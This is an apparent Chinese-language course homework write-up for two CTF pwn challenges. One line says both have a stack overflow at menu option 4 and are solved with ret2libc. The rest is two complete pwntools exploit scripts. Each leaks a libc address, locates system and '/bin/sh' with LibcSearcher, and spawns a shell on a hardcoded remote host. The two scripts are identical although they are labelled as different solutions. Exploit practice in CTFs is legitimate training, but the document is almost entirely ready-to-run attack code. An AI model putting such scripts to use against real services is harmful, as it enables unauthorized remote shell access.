掘安作业二

思路：有低级魔法和高级魔法两部分，经分析，在选项四处存在栈溢出漏洞，两题目我都使用了ret2libc的方法，成功获得shell。

低级魔法脚本：

# -*- coding:utf-8 -*-

from pwn import *

from LibcSearcher import *

context.log_level = "debug"

elf = ELF("pwn")

debugg=1 #0表示远程调试，1表示本地调试

sh = 0.

lib = 0

def pwn(ip,port,debug):

       global sh

       global lib

      

       if(debug == 1):

              sh = process("./pwn")

       else:

              sh = remote(ip,port)

              #lib = ELF("./libc6-i386_2.23-0ubuntu10_amd64.so")

       #catFlag = 0x08048847

       offset = 22

       sh.recv()

       sh.sendline("4")

       sh.recvuntil("You are one step short of success ")

      

    payload1=offset*'a'+p32(elf.plt['puts'])+p32(0x0804862E)+p32(elf.got['__libc_start_main'])

       sh.send(payload1)#应该将send改为sendline

       addr__libc_start_main=u32(sh.recv(4))#获取本程序进程中__libc_start_main的地址

      

       obj = LibcSearcher("__libc_start_main", addr__libc_start_main)#libcsearch大法启动

       baseaddr_libc=addr__libc_start_main-obj.dump("__libc_start_main")

       addr_system=baseaddr_libc+obj.dump("system")#获得sytem地址

       addr_binsh=baseaddr_libc+obj.dump("str_bin_sh")#获得/bin/sh的地址

       #print addr_system

       #print addr_binsh

       #addr_read=baseaddr_libc+obj.dump("read")

       sh.sendline("4")

       sh.recv()

       #addr_bss=0x0804a040

       #pppr=0x0804876d

#payload2=offset*"a"+p32(elf.plt['read'])+p32(pppr)+p32(0)+p32(addr_bss)+p32(8)+p32(addr_system)+p32(0x11111111)+p32(addr_bss) #/bin/shx00 共8个字节

       payload2=offset*'a'+p32(addr_system)+p32(0x11111111)+p32(addr_binsh)

       sh.sendline(payload2) 

       #sh.send("/bin/shx00")

       sh.interactive()

      

if __name__ == "__main__":

       pwn("101.132.100.243",10011,debugg)

高级魔法脚本：

# -*- coding:utf-8 -*-

from pwn import *

from LibcSearcher import *

context.log_level = "debug"

elf = ELF("pwn")

debugg=1 #0表示远程调试，1表示本地调试

sh = 0.

lib = 0

def pwn(ip,port,debug):

       global sh

       global lib

      

       if(debug == 1):

              sh = process("./pwn")

       else:

              sh = remote(ip,port)

              #lib = ELF("./libc6-i386_2.23-0ubuntu10_amd64.so")

       #catFlag = 0x08048847

       offset = 22

       sh.recv()

       sh.sendline("4")

       sh.recvuntil("You are one step short of success ")

      

    payload1=offset*'a'+p32(elf.plt['puts'])+p32(0x0804862E)+p32(elf.got['__libc_start_main'])

       sh.send(payload1)#应该将send改为sendline

       addr__libc_start_main=u32(sh.recv(4))#获取本程序进程中__libc_start_main的地址

      

       obj = LibcSearcher("__libc_start_main", addr__libc_start_main)#libcsearch大法启动

       baseaddr_libc=addr__libc_start_main-obj.dump("__libc_start_main")

       addr_system=baseaddr_libc+obj.dump("system")#获得sytem地址

       addr_binsh=baseaddr_libc+obj.dump("str_bin_sh")#获得/bin/sh的地址

       #print addr_system

       #print addr_binsh

       #addr_read=baseaddr_libc+obj.dump("read")

       sh.sendline("4")

       sh.recv()

       #addr_bss=0x0804a040

       #pppr=0x0804876d

#payload2=offset*"a"+p32(elf.plt['read'])+p32(pppr)+p32(0)+p32(addr_bss)+p32(8)+p32(addr_system)+p32(0x11111111)+p32(addr_bss) #/bin/shx00 共8个字节

       payload2=offset*'a'+p32(addr_system)+p32(0x11111111)+p32(addr_binsh)

       sh.sendline(payload2) 

       #sh.send("/bin/shx00")

       sh.interactive()

      

if __name__ == "__main__":

       pwn("101.132.100.243",10011,debugg)